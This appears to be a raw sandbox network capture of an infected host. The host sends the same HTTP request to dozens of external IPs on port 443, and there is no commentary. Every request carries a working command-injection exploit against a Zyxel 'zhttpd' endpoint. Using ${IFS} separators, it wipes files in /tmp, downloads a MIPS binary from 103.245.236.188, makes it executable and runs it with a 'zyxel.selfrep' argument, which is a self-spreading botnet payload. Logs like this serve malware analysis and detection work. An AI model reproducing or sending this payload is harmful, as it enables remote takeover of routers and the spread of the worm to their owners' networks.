                                    Jan 13, 2024 19:02:52.603049994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8949192.168.2.133511263.161.51.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603095055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8950192.168.2.135238839.138.185.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603128910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8951192.168.2.1359760189.36.11.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603197098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8952192.168.2.1334976158.198.178.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603240967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8953192.168.2.1353200157.28.140.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603276014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8954192.168.2.1349896195.249.81.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603331089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8955192.168.2.1356398108.159.140.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603414059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8956192.168.2.136086847.2.46.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603483915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8957192.168.2.134955650.109.80.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603539944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8958192.168.2.1347240201.83.181.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603576899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8959192.168.2.135575060.73.16.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603648901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8960192.168.2.133435836.214.17.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603676081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8961192.168.2.1345944119.201.81.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603739977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8962192.168.2.1353680105.174.110.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603812933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8963192.168.2.135511066.135.235.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603879929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8964192.168.2.134345424.165.202.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.603933096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8965192.168.2.133321023.45.220.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604002953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8966192.168.2.1340694207.241.176.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604101896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8967192.168.2.133912680.222.207.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604114056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8968192.168.2.1338776190.8.216.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604193926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8969192.168.2.1359620205.210.30.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604227066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8970192.168.2.134819095.153.168.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604295969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8971192.168.2.1343972141.44.78.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604338884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8972192.168.2.1358484196.222.112.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604371071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8973192.168.2.1337352217.21.241.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604444027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8974192.168.2.1333770123.195.153.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604487896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8975192.168.2.1346838132.64.99.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604541063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8976192.168.2.1352474207.165.149.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604610920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8977192.168.2.1351630164.95.16.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604640961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8978192.168.2.134713234.95.133.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604693890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8979192.168.2.135324427.6.53.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604753971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8980192.168.2.134150859.155.58.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604804993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8981192.168.2.134099476.46.151.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604866028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8982192.168.2.13410668.208.167.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604931116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8983192.168.2.1340016110.137.234.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.604988098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8984192.168.2.1346866109.37.247.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605041027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8985192.168.2.1357230222.97.192.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605081081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8986192.168.2.1348936197.162.130.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605148077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8987192.168.2.13518122.82.211.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605185986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8988192.168.2.1339760132.246.144.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605233908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8989192.168.2.1353478178.162.27.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605298996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8990192.168.2.1359644116.219.221.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605364084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8991192.168.2.1351240145.81.17.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605429888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8992192.168.2.1343700184.142.113.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605468988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8993192.168.2.1346798155.111.127.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605530977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8994192.168.2.134957680.247.188.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605591059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8995192.168.2.1341642172.106.155.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605654955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8996192.168.2.1336592164.179.251.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605704069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8997192.168.2.135071292.58.74.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605758905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8998192.168.2.1348804187.168.14.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605798960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8999192.168.2.1346630213.121.115.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605863094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9000192.168.2.135164091.154.207.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605909109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9001192.168.2.1354884179.10.107.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.605946064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9002192.168.2.1336914104.45.52.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606019020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9003192.168.2.1333718132.138.217.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606069088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9004192.168.2.1332794142.215.29.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606126070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9005192.168.2.1340672159.74.247.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606163025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9006192.168.2.133767694.38.94.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606218100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9007192.168.2.133597691.61.150.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606262922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9008192.168.2.1346132102.131.91.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606307983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9009192.168.2.134954697.21.246.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606347084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9010192.168.2.1360914179.154.57.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:52.606415033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9011192.168.2.1333740168.75.137.76443
                                    TimestampBytes transferredDirectionData
